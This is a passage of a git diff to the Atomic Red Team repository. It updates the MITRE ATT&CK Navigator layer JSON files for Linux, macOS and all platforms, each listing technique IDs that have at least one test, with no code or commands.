001","score":100,"enabled":true},{"techniqueID":"T1136","score":100,"enabled":true},{"techniqueID":"T1176","score":100,"enabled":true},{"techniqueID":"T1201","score":100,"enabled":true},{"techniqueID":"T1217","score":100,"enabled":true},{"techniqueID":"T1222.002","score":100,"enabled":true},{"techniqueID":"T1222","score":100,"enabled":true},{"techniqueID":"T1485","score":100,"enabled":true},{"techniqueID":"T1486","score":100,"enabled":true},{"techniqueID":"T1496","score":100,"enabled":true},{"techniqueID":"T1497.001","score":100,"enabled":true},
{"techniqueID":"T1497","score":100,"enabled":true},{"techniqueID":"T1518.001","score":100,"enabled":true},{"techniqueID":"T1518","score":100,"enabled":true},{"techniqueID":"T1529","score":100,"enabled":true},{"techniqueID":"T1543.002","score":100,"enabled":true},{"techniqueID":"T1543","score":100,"enabled":true},{"techniqueID":"T1546.004","score":100,"enabled":true},{"techniqueID":"T1546","score":100,"enabled":true},{"techniqueID":"T1546.005","score":100,"enabled":true},{"techniqueID":"T1547.006","score":100,"enabled":true},{"techniqueID":"T1547","score":100,"enabled":true},{"techniqueID":"T1548.001","score":100,"enabled":true},{"techniqueID":"T1548","score":100,"enabled":true},{"techniqueID":"T1548.003","score":100,"enabled":true},{"techniqueID":"T1552.001","score":100,"enabled":true},{"techniqueID":"T1552","score":100,"enabled":true},{"techniqueID":"T1552.003","score":100,"enabled":true},{"techniqueID":"T1552.004","score":100,"enabled":true},{"techniqueID":"T1552.007","score":100,"enabled":true},{"techniqueID":"T1553.004","score":100,"enabled":true},{"techniqueID":"T1553","score":100,"enabled":true},{"techniqueID":"T1560.001","score":100,"enabled":true},{"techniqueID":"T1560","score":100,"enabled":true},{"techniqueID":"T1560.002","score":100,"enabled":true},{"techniqueID":"T1562.001","score":100,"enabled":true},{"techniqueID":"T1562","score":100,"enabled":true},{"techniqueID":"T1562.003","score":100,"enabled":true},{"techniqueID":"T1562.004","score":100,"enabled":true},{"techniqueID":"T1562.006","score":100,"enabled":true},{"techniqueID":"T1564.001","score":100,"enabled":true},{"techniqueID":"T1564","score":100,"enabled":true},{"techniqueID":"T1571","score":100,"enabled":true},{"techniqueID":"T1574.006","score":100,"enabled":true},{"techniqueID":"T1574","score":100,"enabled":true},{"techniqueID":"T1609","score":100,"enabled":true},{"techniqueID":"T1610","score":100,"enabled":true},{"techniqueID":"T1611","score":100,"enabled":true}]} \ No newline at end of file 
+{"version":"4.1","name":"Atomic Red Team (Linux)","description":"Atomic Red Team (Linux) MITRE ATT&CK Navigator Layer","domain":"mitre-enterprise","gradient":{"colors":["#ce232e","#ce232e"],"minValue":0,"maxValue":100},"legendItems":[{"label":"Has at least one test","color":"#ce232e"}],"techniques":[{"techniqueID":"T1003.007","score":100,"enabled":true},{"techniqueID":"T1003","score":100,"enabled":true},{"techniqueID":"T1003.008","score":100,"enabled":true},{"techniqueID":"T1014","score":100,"enabled":true},{"techniqueID":"T1016","score":100,"enabled":true},{"techniqueID":"T1018","score":100,"enabled":true},{"techniqueID":"T1027.001","score":100,"enabled":true},{"techniqueID":"T1027","score":100,"enabled":true},{"techniqueID":"T1027.002","score":100,"enabled":true},{"techniqueID":"T1027","score":100,"enabled":true},{"techniqueID":"T1030","score":100,"enabled":true},{"techniqueID":"T1033","score":100,"enabled":true},{"techniqueID":"T1036.003","score":100,"enabled":true},{"techniqueID":"T1036","score":100,"enabled":true},{"techniqueID":"T1036.005","score":100,"enabled":true},{"techniqueID":"T1037.004","score":100,"enabled":true},{"techniqueID":"T1037","score":100,"enabled":true},{"techniqueID":"T1040","score":100,"enabled":true},{"techniqueID":"T1046","score":100,"enabled":true},{"techniqueID":"T1048.003","score":100,"enabled":true},{"techniqueID":"T1048","score":100,"enabled":true},{"techniqueID":"T1048","score":100,"enabled":true},{"techniqueID":"T1049","score":100,"enabled":true},{"techniqueID":"T1053.001","score":100,"enabled":true},{"techniqueID":"T1053","score":100,"enabled":true},{"techniqueID":"T1053.003","score":100,"enabled":true},{"techniqueID":"T1053.006","score":100,"enabled":true},{"techniqueID":"T1053.007","score":100,"enabled":true},{"techniqueID":"T1056.001","score":100,"enabled":true},{"techniqueID":"T1056","score":100,"enabled":true},{"techniqueID":"T1057","score":100,"enabled":true},{"techniqueID":"T1059.004","score":100,"enabled":true},{"techniqu
eID":"T1059","score":100,"enabled":true},{"techniqueID":"T1059.006","score":100,"enabled":true},{"techniqueID":"T1069.001","score":100,"enabled":true},{"techniqueID":"T1069","score":100,"enabled":true},{"techniqueID":"T1070.002","score":100,"enabled":true},{"techniqueID":"T1070","score":100,"enabled":true},{"techniqueID":"T1070.003","score":100,"enabled":true},{"techniqueID":"T1070.004","score":100,"enabled":true},{"techniqueID":"T1070.006","score":100,"enabled":true},{"techniqueID":"T1071.001","score":100,"enabled":true},{"techniqueID":"T1071","score":100,"enabled":true},{"techniqueID":"T1074.001","score":100,"enabled":true},{"techniqueID":"T1074","score":100,"enabled":true},{"techniqueID":"T1082","score":100,"enabled":true},{"techniqueID":"T1083","score":100,"enabled":true},{"techniqueID":"T1087.001","score":100,"enabled":true},{"techniqueID":"T1087","score":100,"enabled":true},{"techniqueID":"T1090.001","score":100,"enabled":true},{"techniqueID":"T1090","score":100,"enabled":true},{"techniqueID":"T1098.004","score":100,"enabled":true},{"techniqueID":"T1098","score":100,"enabled":true},{"techniqueID":"T1105","score":100,"enabled":true},{"techniqueID":"T1110.004","score":100,"enabled":true},{"techniqueID":"T1110","score":100,"enabled":true},{"techniqueID":"T1113","score":100,"enabled":true},{"techniqueID":"T1132.001","score":100,"enabled":true},{"techniqueID":"T1132","score":100,"enabled":true},{"techniqueID":"T1135","score":100,"enabled":true},{"techniqueID":"T1136.001","score":100,"enabled":true},{"techniqueID":"T1136","score":100,"enabled":true},{"techniqueID":"T1176","score":100,"enabled":true},{"techniqueID":"T1201","score":100,"enabled":true},{"techniqueID":"T1217","score":100,"enabled":true},{"techniqueID":"T1222.002","score":100,"enabled":true},{"techniqueID":"T1222","score":100,"enabled":true},{"techniqueID":"T1485","score":100,"enabled":true},{"techniqueID":"T1486","score":100,"enabled":true},{"techniqueID":"T1496","score":100,"enabled":true},{"techniqueI
D":"T1497.001","score":100,"enabled":true},{"techniqueID":"T1497","score":100,"enabled":true},{"techniqueID":"T1518.001","score":100,"enabled":true},{"techniqueID":"T1518","score":100,"enabled":true},{"techniqueID":"T1529","score":100,"enabled":true},{"techniqueID":"T1543.002","score":100,"enabled":true},{"techniqueID":"T1543","score":100,"enabled":true},{"techniqueID":"T1546.004","score":100,"enabled":true},{"techniqueID":"T1546","score":100,"enabled":true},{"techniqueID":"T1546.005","score":100,"enabled":true},{"techniqueID":"T1547.006","score":100,"enabled":true},{"techniqueID":"T1547","score":100,"enabled":true},{"techniqueID":"T1548.001","score":100,"enabled":true},{"techniqueID":"T1548","score":100,"enabled":true},{"techniqueID":"T1548.003","score":100,"enabled":true},{"techniqueID":"T1552.001","score":100,"enabled":true},{"techniqueID":"T1552","score":100,"enabled":true},{"techniqueID":"T1552.003","score":100,"enabled":true},{"techniqueID":"T1552.004","score":100,"enabled":true},{"techniqueID":"T1552.007","score":100,"enabled":true},{"techniqueID":"T1553.004","score":100,"enabled":true},{"techniqueID":"T1553","score":100,"enabled":true},{"techniqueID":"T1560.001","score":100,"enabled":true},{"techniqueID":"T1560","score":100,"enabled":true},{"techniqueID":"T1560.002","score":100,"enabled":true},{"techniqueID":"T1562.001","score":100,"enabled":true},{"techniqueID":"T1562","score":100,"enabled":true},{"techniqueID":"T1562.003","score":100,"enabled":true},{"techniqueID":"T1562.004","score":100,"enabled":true},{"techniqueID":"T1562.006","score":100,"enabled":true},{"techniqueID":"T1564.001","score":100,"enabled":true},{"techniqueID":"T1564","score":100,"enabled":true},{"techniqueID":"T1571","score":100,"enabled":true},{"techniqueID":"T1574.006","score":100,"enabled":true},{"techniqueID":"T1574","score":100,"enabled":true},{"techniqueID":"T1609","score":100,"enabled":true},{"techniqueID":"T1610","score":100,"enabled":true},{"techniqueID":"T1611","score":100,"enabl
ed":true}]} \ No newline at end of file diff --git a/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-macos.json b/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-macos.json index 018c33c7..0a502e83 100644 --- a/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-macos.json +++ b/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-macos.json 
@@ -1 +1 @@ -{"version":"4.1","name":"Atomic Red Team (macOS)","description":"Atomic Red Team (macOS) MITRE ATT&CK Navigator Layer","domain":"mitre-enterprise","gradient":{"colors":["#ce232e","#ce232e"],"minValue":0,"maxValue":100},"legendItems":[{"label":"Has at least one test","color":"#ce232e"}],"techniques":[{"techniqueID":"T1016","score":100,"enabled":true},{"techniqueID":"T1018","score":100,"enabled":true},{"techniqueID":"T1027.001","score":100,"enabled":true},{"techniqueID":"T1027","score":100,"enabled":true},{"techniqueID":"T1027.002","score":100,"enabled":true},{"techniqueID":"T1027","score":100,"enabled":true},{"techniqueID":"T1030","score":100,"enabled":true},{"techniqueID":"T1033","score":100,"enabled":true},{"techniqueID":"T1036.006","score":100,"enabled":true},{"techniqueID":"T1036","score":100,"enabled":true},{"techniqueID":"T1037.002","score":100,"enabled":true},{"techniqueID":"T1037","score":100,"enabled":true},{"techniqueID":"T1037.004","score":100,"enabled":true},{"techniqueID":"T1037.005","score":100,"enabled":true},{"techniqueID":"T1040","score":100,"enabled":true},{"techniqueID":"T1046","score":100,"enabled":true},{"techniqueID":"T1048.003","score":100,"enabled":true},{"techniqueID":"T1048","score":100,"enabled":true},{"techniqueID":"T1048","score":100,"enabled":true},{"techniqueID":"T1049","score":100,"enabled":true},{"techniqueID":"T1053.003","score":100,"enabled":true},{"techniqueID":"T1053","score":100,"enabled":true},{"techniqueID":"T1053.004","score":100,"enabled":true},{"techniqueID":"T1053.007","score":100,"enabled":true},{"techniqueID":"T1056.002","score":100,"enabled":true},{"techniqueID":"T1056","score":100,"enabled":true},{"techniqueID":"T1057","score":100,"enabled":true},{"techniqueID":"T1059.002","score":100,"enabled":true},{"techniqueID":"T1059","score":100,"enabled":true},{"techniqueID":"T1059.004","score":100,"enabled":true},{"techniqueID":"T1069.001","score":100,"enabled":true},{"techniqueID":"T1069","score":100,"enabled":true
},{"techniqueID":"T1070.002","score":100,"enabled":true},{"techniqueID":"T1070","score":100,"enabled":true},{"techniqueID":"T1070.003","score":100,"enabled":true},{"techniqueID":"T1070.004","score":100,"enabled":true},{"techniqueID":"T1070.006","score":100,"enabled":true},{"techniqueID":"T1071.001","score":100,"enabled":true},{"techniqueID":"T1071","score":100,"enabled":true},{"techniqueID":"T1074.001","score":100,"enabled":true},{"techniqueID":"T1074","score":100,"enabled":true},{"techniqueID":"T1082","score":100,"enabled":true},{"techniqueID":"T1083","score":100,"enabled":true},{"techniqueID":"T1087.001","score":100,"enabled":true},{"techniqueID":"T1087","score":100,"enabled":true},{"techniqueID":"T1090.001","score":100,"enabled":true},{"techniqueID":"T1090","score":100,"enabled":true},{"techniqueID":"T1098.004","score":100,"enabled":true},{"techniqueID":"T1098","score":100,"enabled":true},{"techniqueID":"T1105","score":100,"enabled":true},{"techniqueID":"T1110.004","score":100,"enabled":true},{"techniqueID":"T1110","score":100,"enabled":true},{"techniqueID":"T1113","score":100,"enabled":true},{"techniqueID":"T1115","score":100,"enabled":true},{"techniqueID":"T1132.001","score":100,"enabled":true},{"techniqueID":"T1132","score":100,"enabled":true},{"techniqueID":"T1135","score":100,"enabled":true},{"techniqueID":"T1136.001","score":100,"enabled":true},{"techniqueID":"T1136","score":100,"enabled":true},{"techniqueID":"T1176","score":100,"enabled":true},{"techniqueID":"T1201","score":100,"enabled":true},{"techniqueID":"T1217","score":100,"enabled":true},{"techniqueID":"T1222.002","score":100,"enabled":true},{"techniqueID":"T1222","score":100,"enabled":true},{"techniqueID":"T1485","score":100,"enabled":true},{"techniqueID":"T1496","score":100,"enabled":true},{"techniqueID":"T1497.001","score":100,"enabled":true},{"techniqueID":"T1497","score":100,"enabled":true},{"techniqueID":"T1518.001","score":100,"enabled":true},{"techniqueID":"T1518","score":100,"enabled":true},
{"techniqueID":"T1518","score":100,"enabled":true},{"techniqueID":"T1529","score":100,"enabled":true},{"techniqueID":"T1543.001","score":100,"enabled":true},{"techniqueID":"T1543","score":100,"enabled":true},{"techniqueID":"T1543.004","score":100,"enabled":true},{"techniqueID":"T1546.004","score":100,"enabled":true},{"techniqueID":"T1546","score":100,"enabled":true},{"techniqueID":"T1546.005","score":100,"enabled":true},{"techniqueID":"T1546.014","score":100,"enabled":true},{"techniqueID":"T1547.007","score":100,"enabled":true},{"techniqueID":"T1547","score":100,"enabled":true},{"techniqueID":"T1547.011","score":100,"enabled":true},{"techniqueID":"T1548.001","score":100,"enabled":true},{"techniqueID":"T1548","score":100,"enabled":true},{"techniqueID":"T1548.003","score":100,"enabled":true},{"techniqueID":"T1552.001","score":100,"enabled":true},{"techniqueID":"T1552","score":100,"enabled":true},{"techniqueID":"T1552.003","score":100,"enabled":true},{"techniqueID":"T1552.004","score":100,"enabled":true},{"techniqueID":"T1552.007","score":100,"enabled":true},{"techniqueID":"T1553.001","score":100,"enabled":true},{"techniqueID":"T1553","score":100,"enabled":true},{"techniqueID":"T1553.004","score":100,"enabled":true},{"techniqueID":"T1555.001","score":100,"enabled":true},{"techniqueID":"T1555","score":100,"enabled":true},{"techniqueID":"T1555.003","score":100,"enabled":true},{"techniqueID":"T1560.001","score":100,"enabled":true},{"techniqueID":"T1560","score":100,"enabled":true},{"techniqueID":"T1562.001","score":100,"enabled":true},{"techniqueID":"T1562","score":100,"enabled":true},{"techniqueID":"T1562.003","score":100,"enabled":true},{"techniqueID":"T1564.001","score":100,"enabled":true},{"techniqueID":"T1564","score":100,"enabled":true},{"techniqueID":"T1564.002","score":100,"enabled":true},{"techniqueID":"T1569.001","score":100,"enabled":true},{"techniqueID":"T1569","score":100,"enabled":true},{"techniqueID":"T1571","score":100,"enabled":true},{"techniqueID":"T1609
","score":100,"enabled":true}]} \ No newline at end of file +{"version":"4.1","name":"Atomic Red Team (macOS)","description":"Atomic Red Team (macOS) MITRE ATT&CK Navigator Layer","domain":"mitre-enterprise","gradient":{"colors":["#ce232e","#ce232e"],"minValue":0,"maxValue":100},"legendItems":[{"label":"Has at least one test","color":"#ce232e"}],"techniques":[{"techniqueID":"T1016","score":100,"enabled":true},{"techniqueID":"T1018","score":100,"enabled":true},{"techniqueID":"T1027.001","score":100,"enabled":true},{"techniqueID":"T1027","score":100,"enabled":true},{"techniqueID":"T1027.002","score":100,"enabled":true},{"techniqueID":"T1027","score":100,"enabled":true},{"techniqueID":"T1030","score":100,"enabled":true},{"techniqueID":"T1033","score":100,"enabled":true},{"techniqueID":"T1036.005","score":100,"enabled":true},{"techniqueID":"T1036","score":100,"enabled":true},{"techniqueID":"T1036.006","score":100,"enabled":true},{"techniqueID":"T1037.002","score":100,"enabled":true},{"techniqueID":"T1037","score":100,"enabled":true},{"techniqueID":"T1037.004","score":100,"enabled":true},{"techniqueID":"T1037.005","score":100,"enabled":true},{"techniqueID":"T1040","score":100,"enabled":true},{"techniqueID":"T1046","score":100,"enabled":true},{"techniqueID":"T1048.003","score":100,"enabled":true},{"techniqueID":"T1048","score":100,"enabled":true},{"techniqueID":"T1048","score":100,"enabled":true},{"techniqueID":"T1049","score":100,"enabled":true},{"techniqueID":"T1053.003","score":100,"enabled":true},{"techniqueID":"T1053","score":100,"enabled":true},{"techniqueID":"T1053.004","score":100,"enabled":true},{"techniqueID":"T1053.007","score":100,"enabled":true},{"techniqueID":"T1056.002","score":100,"enabled":true},{"techniqueID":"T1056","score":100,"enabled":true},{"techniqueID":"T1057","score":100,"enabled":true},{"techniqueID":"T1059.002","score":100,"enabled":true},{"techniqueID":"T1059","score":100,"enabled":true},{"techniqueID":"T1059.004","score":100,"enabled":true},{
"techniqueID":"T1069.001","score":100,"enabled":true},{"techniqueID":"T1069","score":100,"enabled":true},{"techniqueID":"T1070.002","score":100,"enabled":true},{"techniqueID":"T1070","score":100,"enabled":true},{"techniqueID":"T1070.003","score":100,"enabled":true},{"techniqueID":"T1070.004","score":100,"enabled":true},{"techniqueID":"T1070.006","score":100,"enabled":true},{"techniqueID":"T1071.001","score":100,"enabled":true},{"techniqueID":"T1071","score":100,"enabled":true},{"techniqueID":"T1074.001","score":100,"enabled":true},{"techniqueID":"T1074","score":100,"enabled":true},{"techniqueID":"T1082","score":100,"enabled":true},{"techniqueID":"T1083","score":100,"enabled":true},{"techniqueID":"T1087.001","score":100,"enabled":true},{"techniqueID":"T1087","score":100,"enabled":true},{"techniqueID":"T1090.001","score":100,"enabled":true},{"techniqueID":"T1090","score":100,"enabled":true},{"techniqueID":"T1098.004","score":100,"enabled":true},{"techniqueID":"T1098","score":100,"enabled":true},{"techniqueID":"T1105","score":100,"enabled":true},{"techniqueID":"T1110.004","score":100,"enabled":true},{"techniqueID":"T1110","score":100,"enabled":true},{"techniqueID":"T1113","score":100,"enabled":true},{"techniqueID":"T1115","score":100,"enabled":true},{"techniqueID":"T1132.001","score":100,"enabled":true},{"techniqueID":"T1132","score":100,"enabled":true},{"techniqueID":"T1135","score":100,"enabled":true},{"techniqueID":"T1136.001","score":100,"enabled":true},{"techniqueID":"T1136","score":100,"enabled":true},{"techniqueID":"T1176","score":100,"enabled":true},{"techniqueID":"T1201","score":100,"enabled":true},{"techniqueID":"T1217","score":100,"enabled":true},{"techniqueID":"T1222.002","score":100,"enabled":true},{"techniqueID":"T1222","score":100,"enabled":true},{"techniqueID":"T1485","score":100,"enabled":true},{"techniqueID":"T1496","score":100,"enabled":true},{"techniqueID":"T1497.001","score":100,"enabled":true},{"techniqueID":"T1497","score":100,"enabled":true},{"t
echniqueID":"T1518.001","score":100,"enabled":true},{"techniqueID":"T1518","score":100,"enabled":true},{"techniqueID":"T1518","score":100,"enabled":true},{"techniqueID":"T1529","score":100,"enabled":true},{"techniqueID":"T1543.001","score":100,"enabled":true},{"techniqueID":"T1543","score":100,"enabled":true},{"techniqueID":"T1543.004","score":100,"enabled":true},{"techniqueID":"T1546.004","score":100,"enabled":true},{"techniqueID":"T1546","score":100,"enabled":true},{"techniqueID":"T1546.005","score":100,"enabled":true},{"techniqueID":"T1546.014","score":100,"enabled":true},{"techniqueID":"T1547.007","score":100,"enabled":true},{"techniqueID":"T1547","score":100,"enabled":true},{"techniqueID":"T1547.011","score":100,"enabled":true},{"techniqueID":"T1548.001","score":100,"enabled":true},{"techniqueID":"T1548","score":100,"enabled":true},{"techniqueID":"T1548.003","score":100,"enabled":true},{"techniqueID":"T1552.001","score":100,"enabled":true},{"techniqueID":"T1552","score":100,"enabled":true},{"techniqueID":"T1552.003","score":100,"enabled":true},{"techniqueID":"T1552.004","score":100,"enabled":true},{"techniqueID":"T1552.007","score":100,"enabled":true},{"techniqueID":"T1553.001","score":100,"enabled":true},{"techniqueID":"T1553","score":100,"enabled":true},{"techniqueID":"T1553.004","score":100,"enabled":true},{"techniqueID":"T1555.001","score":100,"enabled":true},{"techniqueID":"T1555","score":100,"enabled":true},{"techniqueID":"T1555.003","score":100,"enabled":true},{"techniqueID":"T1560.001","score":100,"enabled":true},{"techniqueID":"T1560","score":100,"enabled":true},{"techniqueID":"T1562.001","score":100,"enabled":true},{"techniqueID":"T1562","score":100,"enabled":true},{"techniqueID":"T1562.003","score":100,"enabled":true},{"techniqueID":"T1564.001","score":100,"enabled":true},{"techniqueID":"T1564","score":100,"enabled":true},{"techniqueID":"T1564.002","score":100,"enabled":true},{"techniqueID":"T1569.001","score":100,"enabled":true},{"techniqueID":"T156
9","score":100,"enabled":true},{"techniqueID":"T1571","score":100,"enabled":true},{"techniqueID":"T1609","score":100,"enabled":true}]} \ No newline at end of file diff --git a/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer.json b/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer.json index cf3aef14..9444f3fc 100644 --- a/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer.json +++ b/atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer.json 
@@ -1 +1 @@ -{"version":"4.1","name":"Atomic Red Team","description":"Atomic Red Team MITRE ATT&CK Navigator Layer","domain":"mitre-enterprise","gradient":{"colors":["#ce232e","#ce232e"],"minValue":0,"maxValue":100},"legendItems":[{"label":"Has at least one test","color":"#ce232e"}],"techniques":[{"techniqueID":"T1003.001","score":100,"enabled":true},{"techniqueID":"T1003","score":100,"enabled":true},{"techniqueID":"T1003.002","score":100,"enabled":true},{"techniqueID":"T1003.003","score":100,"enabled":true},{"techniqueID":"T1003.004","score":100,"enabled":true},{"techniqueID":"T1003.006","score":100,"enabled":true},{"techniqueID":"T1003.007","score":100,"enabled":true},{"techniqueID":"T1003.008","score":100,"enabled":true},{"techniqueID":"T1003","score":100,"enabled":true},{"techniqueID":"T1006","score":100,"enabled":true},{"techniqueID":"T1007","score":100,"enabled":true},{"techniqueID":"T1010","score":100,"enabled":true},{"techniqueID":"T1012","score":100,"enabled":true},{"techniqueID":"T1014","score":100,"enabled":true},{"techniqueID":"T1016","score":100,"enabled":true},{"techniqueID":"T1018","score":100,"enabled":true},{"techniqueID":"T1020","score":100,"enabled":true},{"techniqueID":"T1021.001","score":100,"enabled":true},{"techniqueID":"T1021","score":100,"enabled":true},{"techniqueID":"T1021.002","score":100,"enabled":true},{"techniqueID":"T1021.003","score":100,"enabled":true},{"techniqueID":"T1021.006","score":100,"enabled":true},{"techniqueID":"T1027.001","score":100,"enabled":true},{"techniqueID":"T1027","score":100,"enabled":true},{"techniqueID":"T1027.002","score":100,"enabled":true},{"techniqueID":"T1027.004","score":100,"enabled":true},{"techniqueID":"T1027","score":100,"enabled":true},{"techniqueID":"T1030","score":100,"enabled":true},{"techniqueID":"T1033","score":100,"enabled":true},{"techniqueID":"T1036.003","score":100,"enabled":true},{"techniqueID":"T1036","score":100,"enabled":true},{"techniqueID":"T1036.004","score":100,"enabled":true},{"tech
niqueID":"T1036.006","score":100,"enabled":true},{"techniqueID":"T1036","score":100,"enabled":true},{"techniqueID":"T1037.001","score":100,"enabled":true},{"techniqueID":"T1037","score":100,"enabled":true},{"techniqueID":"T1037.002","score":100,"enabled":true},{"techniqueID":"T1037.004","score":100,"enabled":true},{"techniqueID":"T1037.005","score":100,"enabled":true},{"techniqueID":"T1040","score":100,"enabled":true},{"techniqueID":"T1046","score":100,"enabled":true},{"techniqueID":"T1047","score":100,"enabled":true},{"techniqueID":"T1048.003","score":100,"enabled":true},{"techniqueID":"T1048","score":100,"enabled":true},{"techniqueID":"T1048","score":100,"enabled":true},{"techniqueID":"T1049","score":100,"enabled":true},{"techniqueID":"T1053.001","score":100,"enabled":true},{"techniqueID":"T1053","score":100,"enabled":true},{"techniqueID":"T1053.002","score":100,"enabled":true},{"techniqueID":"T1053.003","score":100,"enabled":true},{"techniqueID":"T1053.004","score":100,"enabled":true},{"techniqueID":"T1053.005","score":100,"enabled":true},{"techniqueID":"T1053.006","score":100,"enabled":true},{"techniqueID":"T1053.007","score":100,"enabled":true},{"techniqueID":"T1055.001","score":100,"enabled":true},{"techniqueID":"T1055","score":100,"enabled":true},{"techniqueID":"T1055.004","score":100,"enabled":true},{"techniqueID":"T1055.012","score":100,"enabled":true},{"techniqueID":"T1055","score":100,"enabled":true},{"techniqueID":"T1056.001","score":100,"enabled":true},{"techniqueID":"T1056","score":100,"enabled":true},{"techniqueID":"T1056.002","score":100,"enabled":true},{"techniqueID":"T1056.004","score":100,"enabled":true},{"techniqueID":"T1057","score":100,"enabled":true},{"techniqueID":"T1059.001","score":100,"enabled":true},{"techniqueID":"T1059","score":100,"enabled":true},{"techniqueID":"T1059.002","score":100,"enabled":true},{"techniqueID":"T1059.003","score":100,"enabled":true},{"techniqueID":"T1059.004","score":100,"enabled":true},{"techniqueID":"T1059.005",
"score":100,"enabled":true},{"techniqueID":"T1059.006","score":100,"enabled":true},{"techniqueID":"T1069.001","score":100,"enabled":true},{"techniqueID":"T1069","score":100,"enabled":true},{"techniqueID":"T1069.002","score":100,"enabled":true},{"techniqueID":"T1070.001","score":100,"enabled":true},{"techniqueID":"T1070","score":100,"enabled":true},{"techniqueID":"T1070.002","score":100,"enabled":true},{"techniqueID":"T1070.003","score":100,"enabled":true},{"techniqueID":"T1070.004","score":100,"enabled":true},{"techniqueID":"T1070.005","score":100,"enabled":true},{"techniqueID":"T1070.006","score":100,"enabled":true},{"techniqueID":"T1070","score":100,"enabled":true},{"techniqueID":"T1071.001","score":100,"enabled":true},{"techniqueID":"T1071","score":100,"enabled":true},{"techniqueID":"T1071.004","score":100,"enabled":true},{"techniqueID":"T1074.001","score":100,"enabled":true},{"techniqueID":"T1074","score":100,"enabled":true},{"techniqueID":"T1078.001","score":100,"enabled":true},{"techniqueID":"T1078","score":100,"enabled":true},{"techniqueID":"T1078.003","score":100,"enabled":true},{"techniqueID":"T1082","score":100,"enabled":true},{"techniqueID":"T1083","score":100,"enabled":true},{"techniqueID":"T1087.001","score":100,"enabled":true},{"techniqueID":"T1087","score":100,"enabled":true},{"techniqueID":"T1087.002","score":100,"enabled":true},{"techniqueID":"T1090.001","score":100,"enabled":true},{"techniqueID":"T1090","score":100,"enabled":true},{"techniqueID":"T1095","score":100,"enabled":true},{"techniqueID":"T1098.004","score":100,"enabled":true},{"techniqueID":"T1098","score":100,"enabled":true},{"techniqueID":"T1098","score":100,"enabled":true},{"techniqueID":"T1105","score":100,"enabled":true},{"techniqueID":"T1106","score":100,"enabled":true},{"techniqueID":"T1110.001","score":100,"enabled":true},{"techniqueID":"T1110","score":100,"enabled":true},{"techniqueID":"T1110.002","score":100,"enabled":true},{"techniqueID":"T1110.003","score":100,"enabled":true},{
"techniqueID":"T1110.004","score":100,"enabled":true},{"techniqueID":"T1112","score":100,"enabled":true},{"techniqueID":"T1113","score":100,"enabled":true},{"techniqueID":"T1114.001","score":100,"enabled":true},{"techniqueID":"T1114","score":100,"enabled":true},{"techniqueID":"T1115","score":100,"enabled":true},{"techniqueID":"T1119","score":100,"enabled":true},{"techniqueID":"T1120","score":100,"enabled":true},{"techniqueID":"T1123","score":100,"enabled":true},{"techniqueID":"T1124","score":100,"enabled":true},{"techniqueID":"T1127.001","score":100,"enabled":true},{"techniqueID":"T1127","score":100,"enabled":true},{"techniqueID":"T1132.001","score":100,"enabled":true},{"techniqueID":"T1132","score":100,"enabled":true},{"techniqueID":"T1133","score":100,"enabled":true},{"techniqueID":"T1134.001","score":100,"enabled":true},{"techniqueID":"T1134","score":100,"enabled":true},{"techniqueID":"T1134.004","score":100,"enabled":true},{"techniqueID":"T1135","score":100,"enabled":true},{"techniqueID":"T1136.001","score":100,"enabled":true},{"techniqueID":"T1136","score":100,"enabled":true},{"techniqueID":"T1136.002","score":100,"enabled":true},{"techniqueID":"T1137.002","score":100,"enabled":true},{"techniqueID":"T1137","score":100,"enabled":true},{"techniqueID":"T1137.004","score":100,"enabled":true},{"techniqueID":"T1137","score":100,"enabled":true},{"techniqueID":"T1140","score":100,"enabled":true},{"techniqueID":"T1176","score":100,"enabled":true},{"techniqueID":"T1197","score":100,"enabled":true},{"techniqueID":"T1201","score":100,"enabled":true},{"techniqueID":"T1202","score":100,"enabled":true},{"techniqueID":"T1204.002","score":100,"enabled":true},{"techniqueID":"T1204","score":100,"enabled":true},{"techniqueID":"T1207","score":100,"enabled":true},{"techniqueID":"T1216.001","score":100,"enabled":true},{"techniqueID":"T1216","score":100,"enabled":true},{"techniqueID":"T1216","score":100,"enabled":true},{"techniqueID":"T1217","score":100,"enabled":true},{"techniqueID":
"T1218.001","score":100,"enabled":true},{"techniqueID":"T1218","score":100,"enabled":true},{"techniqueID":"T1218.002","score":100,"enabled":true},{"techniqueID":"T1218.003","score":100,"enabled":true},{"techniqueID":"T1218.004","score":100,"enabled":true},{"techniqueID":"T1218.005","score":100,"enabled":true},{"techniqueID":"T1218.007","score":100,"enabled":true},{"techniqueID":"T1218.008","score":100,"enabled":true},{"techniqueID":"T1218.009","score":100,"enabled":true},{"techniqueID":"T1218.010","score":100,"enabled":true},{"techniqueID":"T1218.011","score":100,"enabled":true},{"techniqueID":"T1218","score":100,"enabled":true},{"techniqueID":"T1219","score":100,"enabled":true},{"techniqueID":"T1220","score":100,"enabled":true},{"techniqueID":"T1221","score":100,"enabled":true},{"techniqueID":"T1222.001","score":100,"enabled":true},{"techniqueID":"T1222","score":100,"enabled":true},{"techniqueID":"T1222.002","score":100,"enabled":true},{"techniqueID":"T1482","score":100,"enabled":true},{"techniqueID":"T1485","score":100,"enabled":true},{"techniqueID":"T1486","score":100,"enabled":true},{"techniqueID":"T1489","score":100,"enabled":true},{"techniqueID":"T1490","score":100,"enabled":true},{"techniqueID":"T1491.001","score":100,"enabled":true},{"techniqueID":"T1491","score":100,"enabled":true},{"techniqueID":"T1496","score":100,"enabled":true},{"techniqueID":"T1497.001","score":100,"enabled":true},{"techniqueID":"T1497","score":100,"enabled":true},{"techniqueID":"T1505.002","score":100,"enabled":true},{"techniqueID":"T1505","score":100,"enabled":true},{"techniqueID":"T1505.003","score":100,"enabled":true},{"techniqueID":"T1518.001","score":100,"enabled":true},{"techniqueID":"T1518","score":100,"enabled":true},{"techniqueID":"T1518","score":100,"enabled":true},{"techniqueID":"T1529","score":100,"enabled":true},{"techniqueID":"T1531","score":100,"enabled":true},{"techniqueID":"T1543.001","score":100,"enabled":true},{"techniqueID":"T1543","score":100,"enabled":true},{"tec
